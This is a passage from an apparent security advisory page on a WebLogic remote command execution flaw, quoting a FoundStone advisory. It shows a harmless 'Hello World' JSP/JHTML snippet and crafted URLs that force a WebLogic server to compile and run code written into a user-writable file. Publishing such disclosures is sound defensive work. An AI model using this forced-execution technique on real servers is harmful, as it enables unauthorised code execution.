• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

Weblogic Remote Command Execution Vulnerability

As per the FoundStone Inc. advisory on this topic which is attached in full later in this entry:

" Assume that there is an application on the WebLogic server that writes user entered data to a file called "temp.txt".

Given below is JHTML/JSP code that will print "Hello World":

<java>out.println("Hello World");</java> (JHTML) -or-
<% out.println("Hello World"); %> (JSP)

If this code is somehow inserted in the file "temp.txt" via an application, then the following can be used to invoke forced compilation and execution of "temp.txt":

http://weblogic.site/*.jhtml/path/to/temp.txt (JHTML)
-or-

http://weblogic.site/*.jsp/path/to/temp.txt "